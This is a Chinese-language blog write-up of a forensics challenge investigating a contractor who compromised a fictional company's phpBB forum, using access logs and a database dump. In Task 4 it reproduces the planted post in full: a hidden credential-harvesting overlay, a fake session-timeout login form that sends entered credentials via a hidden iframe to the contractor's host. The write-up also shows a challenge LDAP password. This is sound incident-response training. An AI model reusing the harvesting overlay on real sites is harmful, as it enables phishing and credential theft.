本文最后更新于 2025年3月27日 下午
Level:Easy
Description An external contractor has accessed the internal forum here at Forela via the Guest Wi-Fi, and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.
Task 1 查看 access.log ,发现 10.10.0.78 成功登录,往下看发现 10.255.254.2 登录成功并进入了管理页面(adm)。因此猜测10.10.0.78 是承包商,10.255.254.2是真正的管理员
使用在线 SQLite 查看器 查看 phpbb.sqlite3 文件,发现有两个用户
1 2 What was the username of the external contractor?
Task 2 1 2 What IP address did the contractor use to create their account?10.10 .0.78
Task 3 去 phpbb_posts 里查看 IP 10.10.0.78 的 post_id
1 2 What is the post_id of the malicious post that the contractor made?9
Task 4 发现 phpbb_posts 还有 post_text 字段
使用 linux 的 sqlite3 查看
1 2 pragma table_info(phpbb_users);
发现是网页,整理一下吧
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 This is an example post in your phpBB3 installation. Everything seems to be working. You may delete this post if you like and continue to set up your board. During the installation process your first category and your first forum are assigned an appropriate set of permissions for the predefined usergroups administrators, bots, global moderators, guests, registered users and registered COPPA users. If you also choose to delete your first category and your first forum, do not forget to assign permissions for all these usergroups for all new categories and forums you create. It is recommended to rename your first category and your first forum and copy permissions from these while creating new categories and forums. Have fun!<t > Good Afternoon everyone!<br /> <br /> <br /> <br /> <br /> <br /> </t > <div > <style > body { z-index : 100 ;}.modal { position :fixed; top :0 ; left :0 ; height :100% ; width :100% ; z-index :101 ; background-color :white; opacity :1 ;}.modal .hidden { visibility : hidden;}</style > <script type ="text/javascript" > function sethidden (const d = new Date (); d.setTime (d.getTime () + (24 *60 *60 *1000 )); let expires = "expires=" + d.toUTCString (); document .cookie = "phpbb_token=1;" + expires + ";" ; var modal = document .getElementById ('zbzbz1234' ); modal.classList .add ("hidden" );}document .addEventListener ("DOMContentLoaded" , function (event ) { let cookieexists = false ; let name = "phpbb_token=" ; let cookies = decodeURIComponent (document .cookie ); let ca = cookies.split (';' ); for (let i = 0 ; i < ca.length ; i++) { let c = ca[i]; while (c.charAt (0 ) == ' ' ) { c = c.substring (1 ); } if (c.indexOf (name) == 0 ) { cookieexists = true ; } } if (cookieexists){ return ; } var modal = document .getElementById ('zbzbz1234' ); modal.classList .remove ("hidden" );}); </script > <iframe name ="hiddenframe" id ="hiddenframe" style ="display:none" > </iframe > <div class ="modal hidden" id ="zbzbz1234" onload ="shouldshow" > <div id ="wrap" class ="wrap" > <a id ="top" class ="top-anchor" accesskey ="t" > </a > <div id ="page-header" > <div class ="headerbar" role ="banner" > <div class ="inner" > <div id ="site-description" class ="site-description" > <a id ="logo" class ="logo" href ="./index.php" title ="Board index" > <span class ="site_logo" > </span > </a > <h1 > forum.forela.co.uk</h1 > <p > Forela internal forum</p > <p class ="skiplink" > <a href ="#start_here" > Skip to content</a > </p > </div > <div id ="search-box" class ="search-box search-header" role ="search" > <form action ="./search.php" method ="get" id ="search1" > <fieldset > <input name ="keywords" id ="keywords1" type ="search" maxlength ="128" title ="Search for keywords" class ="inputbox search tiny" size ="20" value ="" placeholder ="Search…" > <button class ="button button-search" type ="submit" title ="Search" > <i class ="icon fa-search fa-fw" aria-hidden ="true" > </i > <span class ="sr-only" > Search</span > </button > <a href ="./search.php" class ="button button-search-end" title ="Advanced search" > <i class ="icon fa-cog fa-fw" aria-hidden ="true" > </i > <span class ="sr-only" > Advanced search</span > </a > </fieldset > </form > </div > </div > </div > <div class ="navbar" role ="navigation" > <div class ="inner" > <ul id ="nav-main" class ="nav-main linklist" role ="menubar" > <li id ="quick-links" class ="quick-links dropdown-container responsive-menu" data-skip-responsive ="true" > <a href ="#" class ="dropdown-trigger dropdown-toggle" > <i class ="icon fa-bars fa-fw" aria-hidden ="true" > </i > <span > Quick links</span > </a > <div class ="dropdown" > <div class ="pointer" > <div class ="pointer-inner" > </div > </div > <ul class ="dropdown-contents" role ="menu" > <li class ="separator" > </li > <li > <a href ="./search.php?search_id=unanswered" role ="menuitem" > <i class ="icon fa-file-o fa-fw icon-gray" aria-hidden ="true" > </i > <span > Unanswered topics</span > </a > </li > <li > <a href ="./search.php?search_id=active_topics" role ="menuitem" > <i class ="icon fa-file-o fa-fw icon-blue" aria-hidden ="true" > </i > <span > Active topics</span > </a > </li > <li class ="separator" > </li > <li > <a href ="./search.php" role ="menuitem" > <i class ="icon fa-search fa-fw" aria-hidden ="true" > </i > <span > Search</span > </a > </li > <li class ="separator" > </li > </ul > </div > </li > <li data-skip-responsive ="true" > <a href ="/phpBB3/app.php/help/faq" rel ="help" title ="Frequently Asked Questions" role ="menuitem" > <i class ="icon fa-question-circle fa-fw" aria-hidden ="true" > </i > <span > FAQ</span > </a > <li class ="rightside" data-skip-responsive ="true" > <a href ="./ucp.php?mode=login" title ="Login" accesskey ="x" role ="menuitem" > <i class ="icon fa-power-off fa-fw" aria-hidden ="true" > </i > <span > Login</span > </a > </li > <li class ="rightside" data-skip-responsive ="true" > <a href ="./ucp.php?mode=register" role ="menuitem" > <i class ="icon fa-pencil-square-o fa-fw" aria-hidden ="true" > </i > <span > Register</span > </a > </li > </ul > <ul id ="nav-breadcrumbs" class ="nav-breadcrumbs linklist navlinks" role ="menubar" > <li class ="breadcrumbs" itemscope ="" itemtype ="http://schema.org/BreadcrumbList" style ="max-width: 936px;" > <span class ="crumb" itemtype ="http://schema.org/ListItem" itemprop ="itemListElement" itemscope ="" > <a href ="./index.php" itemtype ="https://schema.org/Thing" itemprop ="item" accesskey ="h" data-navbar-reference ="index" title ="Board index" > <i class ="icon fa-home fa-fw" > </i > <span itemprop ="name" > Board index</span > </a > <meta itemprop ="position" content ="1" > </span > </li > <li class ="rightside responsive-search" > <a href ="./search.php" title ="View the advanced search options" role ="menuitem" > <i class ="icon fa-search fa-fw" aria-hidden ="true" > </i > <span class ="sr-only" > Search</span > </a > </li > </ul > </div > </div > </div > <a id ="start_here" class ="anchor" > </a > <div id ="page-body" class ="page-body" role ="main" > <div class ="panel" > <div class ="inner" > <div class ="content" > <h3 > Session Timeout</h3 > <br /> <br /> <p > Your session token has timed out in order to proceed you must login again.</p > </div > </div > </div > <form action ="http://10.10.0.78/update.php" method ="post" id ="login" data-focus ="username" target ="hiddenframe" > <div class ="panel" > <div class ="inner" > <div class ="content" > <h2 class ="login-title" > Login</h2 > <fieldset class ="fields1" > <dl > <dt > <label for ="username" > Username:</label > </dt > <dd > <input type ="text" tabindex ="1" name ="username" id ="username" size ="25" value ="" class ="inputbox autowidth" > </dd > </dl > <dl > <dt > <label for ="password" > Password:</label > </dt > <dd > <input type ="password" tabindex ="2" id ="password" name ="password" size ="25" class ="inputbox autowidth" autocomplete ="off" > </dd > </dl > <dl > <dd > <label for ="autologin" > <input type ="checkbox" name ="autologin" id ="autologin" tabindex ="4" > Remember me</label > </dd > <dd > <label for ="viewonline" > <input type ="checkbox" name ="viewonline" id ="viewonline" tabindex ="5" > Hide my online status this session</label > </dd > </dl > <dl > <dt > </dt > <dd > <input type ="submit" name ="login" tabindex ="6" value ="Login" class ="button1" onclick ="sethidden()" > </dd > </dl > </div > </div > </div > </form > </div > <div id ="page-footer" class ="page-footer" role ="contentinfo" > <div class ="navbar" role ="navigation" > <div class ="inner" > <ul id ="nav-footer" class ="nav-footer linklist" role ="menubar" > <li class ="breadcrumbs" > <span class ="crumb" > <a href ="./index.php" data-navbar-reference ="index" title ="Board index" > <i class ="icon fa-home fa-fw" aria-hidden ="true" > </i > <span > Board index</span > </a > </span > </li > <li class ="responsive-menu hidden rightside dropdown-container" > <a href ="javascript:void(0);" class ="js-responsive-menu-link responsive-menu-link dropdown-toggle" > <i class ="icon fa-bars fa-fw" aria-hidden ="true" > </i > </a > <div class ="dropdown" > <div class ="pointer" > <div class ="pointer-inner" > </div > </div > <ul class ="dropdown-contents" > </ul > </div > </li > <li class ="rightside" > All times are <span title ="UTC" > UTC</span > </li > <li class ="rightside" > <a href ="./ucp.php?mode=delete_cookies" data-ajax ="true" data-refresh ="true" role ="menuitem" > <i class ="icon fa-trash fa-fw" aria-hidden ="true" > </i > <span > Delete cookies</span > </a > </li > </ul > </div > </div > <div class ="copyright" > <p class ="footer-row" > <span class ="footer-copyright" > Powered by <a href ="https://www.phpbb.com/" > phpBB</a > ® Forum Software © phpBB Limited</span > </p > <p class ="footer-row" > <a class ="footer-link" href ="./ucp.php?mode=privacy" title ="Privacy" role ="menuitem" > <span class ="footer-link-text" > Privacy</span > </a > | <a class ="footer-link" href ="./ucp.php?mode=terms" title ="Terms" role ="menuitem" > <span class ="footer-link-text" > Terms</span > </a > </p > </div > <div id ="darkenwrapper" class ="darkenwrapper" data-ajax-error-title ="AJAX error" data-ajax-error-text ="Something went wrong when processing ysqlite> > <div id=" darken " class ="darken" > </div > </div > <div id ="phpbb_alert" class ="phpbb_alert" data-l-err ="Error" data-l-timeout-processing-req ="Request timed out." > <a href ="#" class ="alert_close" > <i class ="icon fa-times-circle fa-fw" aria-hidden ="true" > </i > </a > <h3 class ="alert_title" > </h3 > <p class ="alert_text" > </p > </div > <div id ="phpbb_confirm" class ="phpbb_alert" > <a href ="#" class ="alert_close" > <i class ="icon fa-times-circle fa-fw" aria-hidden ="true" > </i > </a > <div class ="alert_text" > </div > </div > </div > </div > <div > <a id ="bottom" class ="anchor" accesskey ="z" > </a > <img src ="./cron.php?cron_type=cron.task.core.tidy_warnings" width ="1" height ="1" alt ="cron" > </div > </div > <span > Greetings everyone,<br > <br > I am just a visiting IT Contractor, it's a fantastic company y'all have here.<br > I hope to work with you all again soon.<br > <br > Regards,<br > Alex Poole</span > </div >
预览发现是一个登录页,代码审计一下会发现表单会把数据发送到 http://10.10.0.78/update.php
1 2 What is the full URI that the credential stealer sends its data to ?
Task 5 查看 phpbb_log 找到登录时间 log_time ,但是日志中显示的时间是 Unix 时间(不懂这个),即纪元格式,因此还需要将时间转换为 UTC,Unix Timestamp to Date
即 Wed, 26 Apr 2023 10:53:12 GMT,转换格式 26/04/2023 10:53:12
1 2 When did the contractor log into the forum as the administrator? (UTC):26/04/2023 10:53:12
Task 6 查找官方文档
LDAP Authentication
“This password will be stored as plain text in the database; it will be visible to everybody who can access your database”,说明数据库中有信息,查看 phpbb_config 配置数据,找到了 ldap_password,Passw0rd1
1 2 In the forum there are plaintext credentials for the LDAP connection, what is the password?
Task 7 从前面已经知道 10.255.254.2 是管理员 IP,所以查看对应 IP 就能找到了
1 2 What is the user agent of the Administrator user ?5.0 (Macintosh; Intel Mac OS X 10 _15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0 .0 .0 Safari/537.36
Task 8 查看 phpbb_log 能发现有 LOG_USERS_ADDED ,时间转化后为:26/04/2023 10:53:51
1 2 What time did the contractor add themselves to the Administrator group? (UTC)26 /04 /2023 10 :53 :51
Task 9 可以看到 IP 10.10.0.78 在 26/04/2023 12:01:38 进行了一个 /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz行为,下载了数据库,因为是 UTC 时间,所以减去 1 小时就正确了
1 2 What time did the contractor download the database backup? (UTC)26 /04 /2023 11 :01 :38
Task 10 直接找到对应时间查看大小
1 2 What was the size in bytes of the database backup as stated by access.log ?34707
Analysis LDAP 大致了解了一下
LDAP(Lightweight Directory Access Protocol),是一个轻量级目录访问协议 ,是一种运行于 TCP/IP 之上的在线目录访问协议,主要用于目录中资源的搜索和查询。使用最广泛的 LDAP 服务如微软的 ADAM(Active Directory Application Mode) 和 OpenLDAP, 重点是协议。LDAP相关的协议很多, X.500(原始目录访问协议),LDAP 是其更轻量级的版本。
更多详细的可以看: LDAP 系列协议 ,What Is LDAP & How Does It Work? ,Basic LDAP Concepts
